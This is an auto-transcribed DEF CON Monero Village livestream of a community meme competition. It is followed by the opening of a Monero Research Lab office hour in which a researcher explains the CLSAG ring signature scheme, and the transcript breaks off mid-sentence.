know. I don't know. I don't know. I don't know. I don't know. I don't know. I don't know. I don't know. OK. It's really difficult to arrange these, as you can imagine. I'm doing my best. Maybe I should specify the next time to do a two-digit number. That way, it's not going to take the entire slide. All right. I have, oh, goodness. Scott, did you take yours down again? No. OK, one second. Isthmus, mine was deleted. Espionage within. It's fine. I assigned you a random number. So you're good. I remember which one is yours. It's all that matters. OK. Time to screen share. And if you are on Twitter, sorry, not Twitter, if you're on YouTube, get ready to spam which number you believe is the best. All right. So let me share the screen. All right. Screen sharing right now. Option one. Option, well, not one. Option two. I'm not shooting off my mouth. I wonder who made that one. Option 52. Fungibility? Question mark. Option three. Minero would be better with proof of stake. Or 1337. Oh, I got the same one. That must have been Isthmus. Did I not get yours? Scott? I don't see mine on there. Oh, damn. Just write a exploit move. Write a program. 
Here, let me refresh. Oh, my gosh. We may have a latecomer. Pretend you haven't read any of them. Of course, refresh here. Yeah. Mine is there and the number one folder. I'm doing four sync. I don't see it. One minute. Let me see if I can get it. Yeah, I'm not seeing it. Sorry, everybody. We'll figure this out. Probably ran out of storage and yours is like, oh, no, I see it. Okay, that's good. Okay. It's fine. Let's see if I can copy this in. Copy. I mean, the meme not being visible to outside observers is pretty on-brand from Minero. All right. Last option, late submission from who knows whom. What if I were merge mine? Thankful for today's circa 2014 at the bottom there. All right, so you get to vote. Do you want option 252, 313, 37 or five? You need to vote in YouTube. Put it in the chat right now. No one has voted yet. So we will see people are quiet today. Come on, put in a vote. It is essential. It's your civic duty to vote on memes. Hope you're able to see the memes well enough given how I have to arrange these. I think we're going to do a wide one next so I can try and fit them all better. We have 24 people voting, but no one actually that's paying attention. They just have it all running on the background. I'm going to give people five more seconds to vote. Otherwise, I'm going to move on. I'm just going to choose one like the dictator I am. Okay. I can't read the text. Well, let's just crop the bottom of the meme. You see it in every single one. So Manero would be better with proof of stake or is this one here? Manero would be better with proof of stake, 1337. I'm not shooting off my mouth. Number two, fungibility question mark. You have what if I were merge mind by thankful for today or Manero would be better with proof of stake. Two, really, Vick, you like your... You said vote, so I'm trying to help you out here. Congrats. Who won? All right. Since nobody has voted other than Vick. Don't count that obviously. I think I need to be the person to decide and I think I'm going to choose the... I think I'm going to go with thankful for today's circuit 2014. Congrats Scott. You won the first round. Okay. Look, Manero would be better with proof of stake is really good admittedly. That's awesome too, Ismus. But just the fact that like this is something that actually happened in Manero's past history, right? It just makes it super, super relevant. So what if I were merge mind by thankful for today? I think is the best choice and I'm sorry, Andres, you came in too late. What if I were merge mind? That was the winner and that was by Scott. All right. Done with this. Let's pull up the second meme now. You can now open up folder number two. That's a trendy meme right now. All right. That's Bonjour. So now we get everyone in five minutes to start working on this one now too. And then I'm going to try and make the template beam work that's right work better with four participants. Okay. Alright, it's better for four participants now, so we're good. The easier for everyone to see. Alright, I'm in. Alright, you're very fast at making these. I was wondering why their live stream was all me. Let me check to see is the stream coming through an HD? I hope so. Looks like it. The stream will be an HD, I just want to make sure the quality, that's a standard. Hopefully it'll be HD when I stream. So you can read text in things. We have a custom JITSI server, but for some reason it still sometimes falls back on lower resolution than would fit in a pipe. So I don't really know what's going on there. 
Wish I knew. I have absolutely no idea what to do with this. For some reason people are doing a bunch of these memes right now. It's not always just a Bonjour one, but sometimes it's like goodbye and then hello. So sometimes they're paired together, sometimes it's just this one. Okay, interesting, interesting. Yeah, mine has nothing to do with the, with the bunch or my text is nothing to do with the meme. Of course, if you're in chat, please comment what you would put to you. You're welcome to put your text or the meme that goes with this. You can participate to Vick's obviously paying close attention so he's going to steal your idea. All right, let's start to get those in. Let me force sync. Let's see who else is added so far I think I want to have Vic. I'm going to grab a beer in the meantime. I'll be back. You Instead of a beer, I'm having a strawberry bubbly. It's basically the same except minus all the alcohol. Did anyone see that Topo Chico is going to make spiked seltzer next year? No, interest. Some people on the ZCashico are more furious because they're really into Topo Chico. I didn't know this actually. I was drinking their twist of lime during the first livestream that I hosted for their Future Developer Fund. I was drinking the twist of lime and they were all there like, yeah, nice. That's how I instantly got some extra brownie points with them by having my Topo Chico. What is Topo Chico? It's like, I don't know, it's some sparkling water. They sell literally just normal plain sparkling water and they sell others that have a few flavors like lime or a few things. They've really been expanding a lot. They're owned by Coca-Cola, of course. It's non-alcoholic. Yeah, but they are making alcoholic ones next year. Justin, did you get paid for this? Basically. I will say, I have not been paid by Coca-Cola, but my brother loves it so much. Basically, he holds it as if it's an ad. It's kind of funny. I'm like, I have to be like, this is not an ad. It's just Nathan. It's a very satisfied customer for some reason. But obviously, I don't waste my money. I drink my Pepsi bubbly. They're going to get my mind of metal wipes. Overpriced water. How about that? I was going to say, C3 has basically an essentially endorsed drinker of hackers drink. Did you submit yours, Scott? I'm seeing v-teaers and vicks. Once again. Yeah, I see minds are hacked and vicks. I don't know why mine isn't showing. It shows it's fully uploaded, but. That's okay. It's not the end of the world. I can just go through and. Yeah. Worst case I can always. Wait, Sarah hacked submitted one. Sarah hacked. Over another channel. Okay, you participating. Right after I arranged my grid to work with four people, a fifth person shows up. Sorry, that was just me. Ismys, are you? Wait, that was you? Okay. So Sarah ismys on behalf of Sarah hack. Okay, I see. I just figure I want to do with it. I didn't want that associated with me. You just thrown another manera contributor under the bus. Got away with it for a minute. I mean, you would have had access to figure out how to get this channel. So it is theoretically believable. Would have been shocking, but also. We're things have happened. But not that shocking. All right, let me arrange these, you know, instead of all this arranges one, two, three, four, it's all it's not very difficult to keep track of four people as long as you name them. My computer is really blinding for some reason. It's not it's not like in this, but that's okay. Almost done. Oh, look at this. 
One of these is a little different than the rest. All right, we got some good ones. Everyone who didn't know what to do with this. It's a good good set of templates here. All right, let's see sharing my screen now. All right, here we go. Make sure if you are on YouTube, please vote if you too much difficulty reading these. Let me know. So the first one lightning network is private. Who needs bonnero me? Bonjour. Actually, I should just number these one through four. Please continue to submit them the same way if you're participating, but like, we'll just have people vote on one, two, three or four. All right. Second one. Bonjour fungibility. Third one. If I use my Bitcoin from this whole, I become invisible. Take that manero. Bonjour. So we'll ask someone to explain that one later without giving it away. And then, you know, fourth one, manero releases new hard fork, ace a company. Bonjour. Definitely nice self deprecating meme there. I like it. I like it. All right. So last one. Now we get the, now we get it. Now you get it. We're going to have to start including an example that's not manero related in this. So we have one vote so far on today's who's voting for number four. Anyone else, please, please put your vote in. But to some extent, this is almost like the, the OG manero meme where someone was like, untraceable public ledger or like who needs privacy and like manero bashes down the wall. It is like privacy matters, privacy first. Fungibility. So it's almost like this where you could be like, who needs like, you know, you have a Bitcoin person ranting at a meetup that's talking too loud about like, what type of privacy implementations are the best and then you have manero guy coming up from his whole being like, Bonjour. Definitely, definitely a lot of scope for some other ones in this discussion. But I do like the self deprecating asic company coming in with Bonjour. Okay, apparently just one person is watching this stream and so they get to determine which one is their favorite. I'll give it another five seconds or so here, but otherwise Andres's vote for number four is going to be the victor. Clearly have to cater to their humor going forward. Yes. This person is a lot of sway. I wanted to go to the circuit win. Like what happened you're doing so well last time. I know. You hype me up. These memes just don't don't work well for you apparently. It's the memes not me. We have a vote for number three, which I'm sure someone bribed them to come on and vote for number three. Wouldn't put a pass that person. All right, now we have a split vote. Do I need to choose again? Please tell me I don't need to choose again. Well, it's between two, right? What was that? You only have to pick between the two, right? Yeah, you have to pick between the two. So number one and number two are out. You can always roll like a dice. What the dice design? Random number generator. Oh, do you need a random number? Four. Four is a good number. All right. Completely random. I am going to use extreme random. What's the name of that? Who's the one that does that? I'm going to use the super random. Oh, I thought you're going to use Gavin and Dresen's thing. No, I'm going to use this Monero. Sorry, this Google generator. But who's a person that like Walton Shane? Yeah, the Walton Shane. Congrats, I won to themselves for winning their own competition. That's a common. Oh, yeah, I remember that. Yeah, exactly. But I'm going to use the Google one instead, which is probably at least as good as a Walton Shane one. 
Three. Three one. Nice. All right. So that is officially Vic. Vic won that one. I don't know. I disagree. I like Scott's better. Well, the science has spoken. Science has spoken. Random number generator may forever be in your favor, Vic. How do we know Google isn't? He could have Google in his pocket too. I mean, this could be like huge. This is true. This is a big conspiracy here. Yeah, you don't know my connections. Oh, that would be intense. All right. So I need to put Vic down as the winner from number two. All right. Just to prevent you from cheating, instead of doing number three, do not open that one. You shall go to number eight. What cheating scheme does that foil? Wait there. Oh, there's somebody that. Did you already do this one? What's going on here? There's like, there's two picks and. Oh, did you combine them into one? Yeah. Yeah, combine them into one. So you can just use the zero eight one. Well, let's see how well this one will be received. It's like the opposite Kanye meme. Okay. One person likes it. Well, I'd like to include yourself. This could be dangerous. I don't know. I live in the rules that we couldn't name you because we have to like implicit. Well, now you can. Yeah. All right. There you go. I said you couldn't name people in other communities that weren't like super, super popular. Yeah. No genuinely harsh. Pretty. Bonus points to whoever knows where that second screenshot was taken. Sorry. That second image was taken. I was not in a good mood. Is that like consensus or something? No, it wasn't consensus. It was a, it was a travel real conference. I was on, I was on a panel with someone from dash, someone from Zcash, a Bitcoin core contributor. And I think that might have been it actually. We're talking about travel rule. Who was, I don't know. I was, I was just annoyed as you can tell. Oh well. Those ones from DEF CON last year. We'll see if this backfires on me. It probably will. No, I might like someone from Rio will take that and then just run with it. So I should be careful. I'm starving. I'm looking forward to having dinner after this. Why did I schedule this at 6pm central? I'm. I'm. I'm surprised the NSA hasn't given a submission there just watching. No, that's my, that's my recording computer. So. I thought it'd be more fun to actually include the logo on it. Just to prove to people that Manero has a back doors, of course. When we designed the Manero protocol, we've our first thought is how do we make sure they have the proper back door, back door they need. So it's a critical part of the discussion. I genuinely do need someone else on here as a co-host to throw a banter back. I really do. Where's Diego? He's good. He was like gone. I needed him. I. Ruben from Z coins texting me. I can tell him he can still hop on. Even if he just, just talks with me. Just to make fun. You can still join if you want. I need a co-host anyway. Well, he might actually be hopping on. Oh, good. I'll be. I think my life easier. And would end the suffering of everyone in the chat. It's all. They're dealing with some stuff. One of my, one of the best things that's helped prove to me like, wow, the community is really committed. They watched. One of the. We try to gaming live stream once. When a lot of people in the community played zero AD, which is like an open source age of empires. Like alternative. And. Everyone was like to concentrate it on the game. And I only was able to share my own screen. 
So they were just watching a concentrated me play a game and everyone, no one else is talking. And goodness. You're all alone, Justin. Yeah, it was just, but we had like hundreds of hours of watch time on that video. And I'm like, if people are willing to spend hundreds of hours watching this, then. Then Menero has something going for it. By the way, I submitted it, but I'm sure I got the concept of the meme wrong again. That's, I don't know. It's always funny when everyone has their own way of interpreting the meme. It really is. Right. You're just going to embarrass your daughter. It's going to be like, dad, you just didn't get it. Yeah, exactly. So big. Let me see if anyone else. I'm going to talk about my daughter when we wanted to name the wallet cake. She's like, do you know what cake means? And slang don't do it. I think we've got all four now. I think so. I don't know why they're not syncing on my end, but it's fine. I can easily copy them from browser. It takes me like an extra half second. I'm going to say, Van, I have to catch up for you. That's what true. I do have a lot of bandwidth going on over here. A lot of direct connections to people. I guess I don't need it all the way in the edge. Okay. One, two, I have three of them on here. My, I forgot to number mine. It's, it's the last one down. It's fine. The most important thing I guess is that someone names it. All right. I like all of these. They're all weird in their own way, but, and, and to be clear, I prefer if you don't actually look at them before the rest of the audience. That way you can save the surprise for everyone else. Otherwise the stream is going to be worse. All right. Everybody ready? We have some good ones here. This is the best one so far, I think. Well, thank you, Ruben for joining us. You're going to have to comment on some of these memes. I'm going to share them and you're going to have to talk about which one you think is the best. I like your background too, by the way, maybe he should. Since he will know, he's really a natural. All right, let's, I'm going to share. Here we go. Three, two, one sharing. All right. So the first one is letting me do my 129th tweet about Zcash and then broke and you stick to Monero. The second one is designing protocols to improve minor privacy and then watching mining pools publish every payout transaction anyways. That one's very relevant because I do bitch about that all the time. The third one, Monero means money. Is that a real movie? And then the fourth one is when you find out CL7 audit comes back great. And then when you find out CL7 won't be released until October. Your YouTube feed is just showing your Google search page. Is it because I see, I'm looking at YouTube right now and I see the memes. What do you guys see? Oh, now I see, no, I see the old ones. That's weird. I guess I'm really behind. Are you behind? I guess I am. Yeah, the live text to re-sync. Potentially if it's not. Sorry about that. Go ahead. These are all really good. You all have did yourselves for these. Sure. I can drop the link to the YouTube stream in here so you all get it. So that's the YouTube stream. How old were you in the first picture, Justin? That was taken last year. What? I'm 22. Wow. And the second picture is around the same age as well. Yeah, it was in November. Yeah, I have to use that. That's one of my favorite photos because I was just so angry about something or just, it clearly went through to the photographer. Do you remember what it was, what you were angry about? 
Someone was saying something stupid about the travel rule. Oh. So we have two votes have come in so far. Before I use those in the chat, Ruben, which one do you like of these four? I like the first one. Okay, okay. Yeah, definitely get a lot of people in the Monero community being like, dude, what the hell are you doing? And then sometimes I like some people through Zcash or like stick to your lane. How deep are your connections, man? Another guy? All those giveaways, you know, they want something back. That's awesome. So I just want to suspiciously say that when, when we're bringing in people who give a last minute vote, both times they're picking Vic. So, and the Google random. Vic. So, but it looks like, you know, two out of the three votes that came in, including Rubens went for the second option number two. So the second option, I think for that was submitted that one that was Ismus. Congratulations, Ismus. Thank you. I know this. I know, I know this annoys you a lot too. So it's funny that you were the one that made that. Yeah, Ismus and I are the two people that Vic, Vic, I see how it is in the YouTube chat yelling at someone for not voting for him. I'm going to start bribing people there and you're going to start doing a giveaway for everyone. A random person who votes for me gets gets a Monero. Pre-staging. It works. Yeah, it does. You're suddenly going to have hundreds of people voting in the chat instead of three. Three thousand votes for Vic. Exactly. Okay, so we currently have a three way tie between Scott, Vic and Ismus that each have one point each. Let me go through. Which meme do I want you all to do next? Oh, speaking of which Ruben, would you like to participate or do you want to just banter with me as we as we carry on your choice? I don't want to participate. You want to participate? Okay, in Telegram I sent you a next cloud link. Okay, got it. Yeah, so there's a bunch of folders. I'll tell you a number. You can open up the folder and there's memes in there. So we already did number one, two and eight. Okay. Let me do actually we have to do this one because it's super, super popular right now. Open up number nine, number nine. Oh, wow. Let me share this on YouTube here. This one's this one's a really popular current meme. All right. It's the Trump interview meme. It's a little different. I mean I've seen different variations of this one. So that, let's treat the box on the middle right there is the, you know, what's on the piece of paper the dude's reading. And how do we submit? Oh, I forgot to, you can submit by uploading it to the same folder. I forgot to prepare this. Did anyone actually use the, it looks like no one actually used the the Libre office template. Did they? I did. Okay, let me get that for you actually. I'll give you a little extra time, Scott. I know I said I would have a template and then I didn't. So it's my bad. I can easily open up and create or whatever. Yeah, it's, I mean, you had the other one. So it's No shit. I'm getting it. I'm getting it. For those who are watching Libre office draw is a very common tool to use for this because you know it's editable like PowerPoint or anything else, but anyone can have it without a license. So it's useful from that in that regard. Okay, Scott, in case you do want one, I did upload the template for you. You don't have to use it of course. I'm such a Microsoft. I don't have open office. I have both Rubens. I have both on all of my computers. At least on my windows. I do need for work. 
So long as it's not 365 and you're paying Microsoft every month. I mean, I'm not paying 365 money, but some other people are paying 365 money. I am. Exactly. All right, be just you over it seems to like this one. They think this one's going to be funny. Let's see what Trump, let's see what the word of Trump is. And just, just to say you don't have to do this, of course, you might have a simple mean that only has something on the card. You may name who the participants are, right, your choice to how much detail you want in the mean, sometimes simpler is better, sometimes complex carries across more clever means. Edit it. Okay. Okay. Okay. Yay, my first submission. See, we're able to upload there. Okay, Ruben. Yeah, I think so. Download liberal office now. It takes a while. It's like a big package. Let's see. Actually, let me update mine real quick. I just thought maybe something better. Oh, you haven't got some money. Okay, I see yours Ruben. I'm not going to say which one but one of these is a very, it's a very clever take on this meme that you would not typically see filled out in this fashion. Okay. Submission submissions from Scott vicken Ruben. Is that correct? Did you say missing? No, I have your three submission. Give me 20 seconds. Got it. Yeah, I'm almost ready. I'm going to go with it until you said, well, I still don't know where to go with it but when you said we could name the characters help. We said I could do what? Name the characters. Oh yeah, you can you can either do or don't need to name the characters, your choice. Okay, sorry, I upload the second version of mine. Okay, you have to. Okay. Submission to the context. Not an issue at all. I have no idea why yours are just not downloading on my computer despite you obviously submitting. Yeah, I would say like maybe it's because I'm running over a VPN or something but the progress bar shows it's fully uploaded. By the way guys, seeing the YouTube chat, BTC Lovera. It says birthday today. Happy birthday. Or she I don't know, it's their birthday. Hopefully this is a good birthday present but I mean, I don't know if spending time with me counts as a birthday present. Maybe most people call that an annoyance. All right, I have a hold on. Like someone else had to do this one. So I have one to have four submissions from people. I won from Ruben Scott Vic. And I don't know who one of them is just called screenshot. Who's this? I don't know. I don't know why it didn't stick. Well, hold on. Okay. Okay, I like all of these are so good. Really hard to fit five of these. It's kind of sketchy how I'm doing it now. So I'm just waiting on. Is it we? Mine should be in there now. Okay, okay, I got yours. Okay, we're good. Give me one second here will be. All right. This doesn't fit very well, but it doesn't matter. All right, here we go. Time for me to share my screen. All right, here we go. You can see it's very awkward to fit the five participants. So I'll have to read these again probably. You know, maybe I can just zoom in and scroll to the right. I don't know. Oh, gosh, the zooming worked for me. It's me right now. Oh, that definitely does not work. Okay, it's fine. First one. I've downloaded and printed the complete mineral blockchain and you can see all of the transactions and then it's a blank sheet of paper. I would not have thought of this, but it is a very clever way to do it with the main part of the meme is just blank and it still works. Second one. 
The message past is verges the best the very best look at this transaction graph here. The guy dude's like what third one. Bitcoin privacy set is larger than Mineros. What. Fourth, Trump represents a new comment every week handing some a message to our mineral. Minero can have value because it's a supply or mineral being like. And then the last one is number five. T s. What. Okay, I actually don't shield Trump coin. What's the what's up with the first TS slash no. That's like. No, it's like top secret no foreigners. Oh, it's like. Got it. People have clearance. We do. This is a clearance only chat as you can tell. So just because the NSA band is here to help us. So we have we have two votes that have come in the story. Yeah, two votes that have come in but they're one new person so BTC will bear us still needs to put theirs in. We have one vote from Febo for number one. We have a vote from Andres. My take wasn't that far from number four they vote for. I like all these they're all good. Look at Andre is trying to vote twice. That's not right. BTC will bear I'm waiting on you you get to number one. Oh, Vic. Man. Vic, how dare you. Hey, no influence. I'm curious and voted for you was it all three times. No, the last time they did it. They might not have heard it for me. Okay, Vic, you won with number one. I like all these. I would have voted for number four. Okay, you want to do one last one. Sure. Okay. Which one do I want. Oh, open up number five. Number five. Number five. Number six. I don't know, but I have a question. I think there's a folder on here that says do not use. It's very, don't use that one. That was, I found out several versions of this meme. This isn't like the OG version, but it is really funny. And I had to just do it. But so something to open that folder anyway. You can open it. You can open and look at it. You just can't use it. I feel like there's something better in there. That's why this whole Friday. It's the same time it means this other one I just thought was better. So I mean, all right. But you know, on that last one, you didn't give names to anybody. So to those memes. So there's no way even though BTC Leroy might be compromised, he couldn't vote for me. Which one always? You just have a certain style, Vic. As far as finger print is concerned, we don't have enough people participating for everyone to be a unique, like everyone's a unique submission style. Yeah. Individuality. So is it worth looking up this meme to cheat a little or is it just like going to be funny if I just get something from? I mean, you can look it up, but like, I don't know how that would help you that much. Yeah. The bucket and the bucket is a bucket's a killer thing. Yeah. There's like five characters in this. My plots aren't that complex. I wonder how long real meme generators like, you know, the people that start these views, how long do they have? They have probably like 12 hours a day to this. Can you imagine like a meme sweatshop? Oh man. We should have our own Monero meme sweatshopper, the Z coin meme sweatshopper, just competing against each other. Like one of those old writer rooms where they're just like, we need more memes. What are you guys doing? 100 memes of fire. Just full of cigarette smoke. Let's see. How do you do this? It's not easy. Now if Isthmus or Scott meet, you know, win this one, then we're going to have a problem because then we're going to have a tie again. I won't win. I have literally no clue what to do with any part of this. 
Like, I'm not familiar with this meme. There's too many characters. This is where we explore. You know, community, how out of touch they are. Well, do you follow memes or something? Are you the one creating all these memes? You've got the meme like a sweatshop going on. That's what's going on. I just find these on meme templates official usually. So there really is a meme on me. Someone's coming up with templates and just putting it in. Man, these are quite the operation. Memes are quite a business. Yes. Well read. Every morning reads his daily meme templates. Yeah, I don't know if you guys followed the meme competition we had on Twitter. We had 300 submissions. It's insane. 300? Yeah. How did you even choose there's only one? Was it a random? Was it like which ones are best? A lot of them are just repeats. So just scroll by. Yeah. I did get help from one other person to go through them. The kid looks like he has his underwear outside his pants but I think it's just his shirt. Oh yeah. Yeah, it's weird. What is that? Tough. You have to zoom in on this one and see what's up. No, it's probably a shirt. No, it's the same as his collar. You can tell it's the same style. So it says underneath his shirt underneath his like sweater or whatever. Sweatshirt, sweater. I always mix them up and my mom yells at me but I don't know the difference between a sweater and a sweatshirt. So confusing. Sounds safari in chat. You've got to be just transparent about where your inches lie. Hey guys, I'm sorry to inform you. I am going to be winning this one. I am that confident. My hand, that was... Well, you've won all the other ones without even, you know, basically no confidence. Vic won the last one too. We need some actual competition for Vic. Get some people from the doge going community. Real memers. Mike, for Chan, you get some real. Already. It's going to submit like a bunch of different variations of Pepe the Frog and they're going to be in everyone. Did you already get up? Yes, here's Vic. Does it make sense? No comment? I am a professional video host. Okay. Despite all evidence of the contrary. I have no idea what to do with this. Vic's also always like the first person to submit. You should have a clock. You should have a shot clock. See, it's hard for me to enforce because I can't just blast across all your screens. I have like had my phone on the side, but that's not as intimidating. Yeah, that's why we need to have like move right at custom. Okay, honestly, I would love to have... What is that Vic? I should put like a LED on the wall behind. I would love to have like a jack box style meme game. That would be great. Oh yeah. They would coordinate all this stuff. That way I'm not going between three different monitors and taking forever and you know, the like. Someone took a screenshot. Yeah, they did. Yeah, that's like wait what? Who's in my house? That's like the... Is that the sound for like the Ubuntu screenshot tool? It's definitely not a snipping tool. Someone was not using snipping tool. No one's passing up to that. Hmm, this is tough. We have a few more submissions coming in now. Oh, I just woke up. This is too early to do this stuff. What time is it? Where you're at? 8am, not too bad. I messed up the time. I thought it was 8am but it was supposed to be 7am. Hmm. I'm cropping these a little bit where it's not relevant just to try and make them a bit bigger. Alright, I have either all of them or all but one. It's all but one for sure. Maybe you guys can go ahead. I'm struggling. 
This is an interesting choice when I'm looking at it right now. I get to check it all out. Are you sure, Ruben? Yeah, yeah, go ahead. Okay, okay. So, about to... So we only have four choices this time. Let me share my screen. I'm glad this sharing screen seems to work really, really well. Okay, screen share. Okay, option number one. Minero, kickpoint, chain analysis and privacy. Option number two. Tiger and transparent ledger advocate. I love how they just put tiger on top of tiger. Someone want to explain themselves there? I mean, you're welcome to stay anonymous but... I had to explain. They're more scared of the transparent ledger advocate than the tiger. Oh, god. Okay. That is funny but I just love the idea that you put tiger on your tiger. All right. I'm not at the sweatshop of meme farms. I don't know how this works. I got more laughs out of you doing it that way than if you didn't. So... Actually, what happened to number one? Was it cut off? Or was it intentional? I'm like... I mean, what do you mean by cut off? I don't know. It seems like the tips of the rabbit ears are cut off. It is a black bar. You know what it is. This doesn't actually exist. Sorry. What? I see what you're doing there, Justin. I was trying... That's like one of the... It's like a background trying to divide and things. It's just... I should have sent it as a template background but that was too much work. So I just... They're all objects that overlap each other annoyingly. You can see there's another one over here. All right. Third choice. Undisclosed double spend and transaction with zero decoys. Someone else want to explain this one or should I go for it? I always want to give the person who makes the meme the ability to explain theirs if they want. So go... Okay. And then the fourth one. Ring size 11, ring size 15 and triptych. They definitely cropped off the whole bottom. They're staring at some undefined objects. It's smart to cut off the rabbit. It kind of looks like they're about to fall off the... Indeed. So that's how you pronounce it. Triptych. Well put people in for the votes coming in. Two people said number one. One person said number two. They said number two for the creative use of the word tiger. It's just so absurd. Actually the worst part is I actually covered up the tiger so you can't even see it. It's like it was just grass there. It's just like... Basically waiting on BTC Laverra to determine who they are choosing for. And of course anyone else. But like sound safari, are you going to vote? You've recently chatted. I feel like number two is such an amazing combination of like so bad is good but also good. In more ways than one. Okay BTC is that a vote for number two? For number one. He said tiger so I guess that's number two. Okay number two. Okay so we have three votes for number two and two votes for number one. So ultimately number two is the winner. Vic was that you? No I was number one. I'm just not... Yeah. I thought I did really well. Mr. Poppy did not win. You had to fail really hard but not fail. Exactly. But do you guys get it? Number one it makes sense right? Monero were pushing Bitcoin users to this nice fluffy thing, innocent thing called privacy and they don't understand there's this very tiger chain line ready to eat you up. Yeah yeah. You're probably... No one's impressed. Tiger over tiger. Yeah exactly. Tiger over tiger. Yeah exactly. Tiger over tiger. Tiger session. Very simple but... It's not just the tiger over tiger though. 
It took a little bit extra explanation I think but overall I still thought it was really funny that like the thing that they were being introduced to is the transparent ledger advocate. Like they're so scared of talking to a transparent ledger advocate. But they're more scared of a transparent ledger advocate than the tiger. You should have put like the Monero users or something, Monero community for those two people. I honestly didn't get it until he was explaining. I was like... Yeah it's pretty good. Now that I've explained it, it is very good. Alright well that concludes our Monero meme competition. So I appreciate everyone who came in and participated. Vic is still the winner because ultimately Vic won twice. Scott won once and to be clear Scott and Vic tied once but really the only reason Vic won was because of Google's die roll. Whatever it takes. Whatever it takes. So apologies Scott. You put in all the work but didn't get any of the recognition there. And then Ismus and BTNerd each won once each. Ruben you didn't get a chance to point out why Zcoin's good. No I'm not going to shield and get like VirtuaTamatas like this. I was expecting you to throw in some like really awesome why Zcoin's better meme. This is your good chance. I like Monero. I mean I like other coins too but if I was brought into the group you gotta make a ruckus. You gotta. Yeah I'm too nice. Alright so with the end of the Monero meme competition that also concludes today's DEFKON Monero village entirely we will be back at 10 am Pacific tomorrow on the same YouTube channel on the same Twitch channel. If you want to watch please come back and watch. You know we'll have a lot of great events coming through. To end tomorrow we will have a trivia night. We'll have a quiz so we'll have another interactive event to finish off tomorrow evening. And then on Sunday you know a bunch of other great talks too. So keep an eye you can go to Monerovillage.org. I'll put that in the chat here in case you have not been following the rest of the talks today. And of course we're starting tomorrow at 10 am with Dr. Daniel Kim like we have started every day. So always really great content from him. So really really cool stuff going on. So yeah thanks everyone who made it this long if you joined just for the Monero meme competition you joined for the fun part maybe not the best part. We can't say that this was useful in any way but it's fun. And yeah we'll see you tomorrow so take care. Good job Justin. Thanks Justin.
|
meme competition
|
10.5446/50658 (DOI)
|
Okay. Hello everyone and welcome to the Monero Research Lab office hour with me, the host, Justin, and the person you actually want to see, Dr. Sarang Noether. To start, I'd like to have Dr. Noether introduce himself before we get going. I think it's useful to set expectations for what this session is: it's very casual on purpose. We're here to answer your questions, and mostly it will be Dr. Noether answering them. We'll be paying attention to YouTube and to Discord to relay questions over, but otherwise this is really your time to make of it what you'd like. So yeah, we're here to answer anything you have. So, Sarang, can you introduce yourself please? Sure. I am Dr. Sarang Noether, a cryptographer and mathematician who is a research contributor to the Monero Research Lab. The Monero Research Lab is a research and development workgroup, not the only one, that conducts research and development for the Monero project. That ends up being protocol research, some of the math, prototyping, coding, all sorts of things to push the Monero protocol, and privacy-preserving digital assets in general, forward from a technical perspective. And like Justin said, the purpose of this office hour is just to very informally, in video form in this case, answer any questions that come up about whatever people want to know more about. So this could be Justin and I sitting here in the quiet for an hour, like often happens in standard university in-person office hours, or it can be really whatever sort of technical discussion folks want to have, using whatever media you have access to. Justin, you said you're watching the Discord and YouTube, is that right? Yeah, so for any questions people have, go ahead and shoot them off to us there. Otherwise, I'll sit here. Perfect. I brought my coffee. I haven't had a lot of coffee with my actual coffee chats recently, but I feel like doubling down on the coffee these last few days. Were you the type of person, in high school maybe, but certainly in college, who went to office hours? Did you personally usually go, or did you not go that often? I did go to office hours when I had questions, and later as a TA, and even later as an instructor. I gained a new appreciation for the nature of office hours when I was the one running them. I did discover that it was often this really cool combination of folks who came because they really wanted to understand something they hadn't before, and a lot of students who really didn't know what they were doing and just wanted as much face-to-face time going over new problems as they could get. One thing I like is that it's not some kind of sign of weakness to go to office hours; it's a sign of being motivated and dedicated to your learning. But there were still many times when nobody showed up to office hours, and then it was just reading books for an hour. What are you going to do? Any questions or any topics of any kind at the moment?
There are no questions and no topics of any kind. But of course, we can also talk a little about some things. Yeah, I was thinking one way we could do it is to sort of troll the answers out of people: just start saying, well, what do you think about this obnoxious thing, just to get people riled up about it. But before we do that, how about you talk about what you've been doing with the Monero Research Lab over the last month or so. So, I would say probably the most interesting thing that people might care about, or at least hopefully they'll care about the effects of it, is CLSAG, which is a new linkable ring signature construction that was really intended to be a drop-in replacement for the linkable ring signature construction that the Monero protocol used to use, called MLSAG. I will say that in hindsight I really regret us not giving it a cooler name. But, you know, what would have been a cooler name for that? I have no idea; if anyone has any ideas, you should tell us. I mean, we ended up getting a pretty cool CLSAG logo. The community came together, we had a few ideas that were pitched, one of which we ultimately went with in the blog post, and they're credited at the bottom. But it's not quite as easy to market as something like Halo or Arcturus. Originally, prior to the confidential transaction model, the linkable ring signature scheme was one by some other authors called LSAG, linkable spontaneous anonymous group signatures. From that point on, moving into the confidential transaction model where we replaced in-the-clear amounts with commitments to amounts, we moved to one that was developed by Shen Noether and others, more of an in-house kind of thing, and that was called MLSAG, multilayered linkable spontaneous anonymous group signatures. The idea there is that you have information in the signature that deals with both the signing keys and certain commitment keys, and by cleverly setting up and arranging how you do that signature, you can both get the signer-ambiguous signature model you're looking for and also throw in a proof of balance, which is very important, in a way that doesn't give up anonymity. The downside to MLSAG signatures is that you basically have two sets of data floating around in the signature itself: one set of data that deals with the signing keys and a separate, parallel set of data that deals with the commitment keys. So the scaling on that is not very good. It scales as the anonymity set per transaction goes up, and every time you add a new ring member you're actually adding two pieces of data, effectively: one for the signing keys and one for the commitment keys. And so the new hotness now is CLSAG, which stands for concise linkable spontaneous anonymous group signatures. It is what it is; those are the names that were chosen. We thought about changing it, but then we were like, ah, we already named it, we can't really rename it, people already knew about it, unless we want to make everything more confusing. But the idea there is to take this information involving the data for the signing keys and the data for the commitment keys.
And it turns out you can combine them together in a weighted fashion that involves some hash functions, to ensure that someone can't maliciously go through and run a forgery on the signature, and basically do the same thing that MLSAG signatures do: show, in a signer-ambiguous way, that you're signing a message on behalf of one of a set of keys without revealing which one it is, while also signing with this other commitment key that you need in order to prove balance. So it's more or less a drop-in replacement, but now you effectively have only one set of data involved: one piece of information per ring member, plus some additional auxiliary information that's used just to make the algebra work. The benefits are, first, that it's basically a drop-in replacement, which is great: everything involving key images sticks around, everything involving the way these keys are structured sticks around. But the benefits you get from it are that the signatures are much smaller. Effectively, the signatures you get for CLSAG are about half the size of those for MLSAG. That's just the signature alone; transactions include more than just the signature. They're also faster to verify, because it turns out you can do some optimization in the way these operations take place: before, you had to do cryptographic work on the linkable side of the data and on the commitment side of the data separately, and now you can effectively do them at the same time and optimize a little that way. So the benefit there is that you end up with about 20% faster signature verification. Transactions that 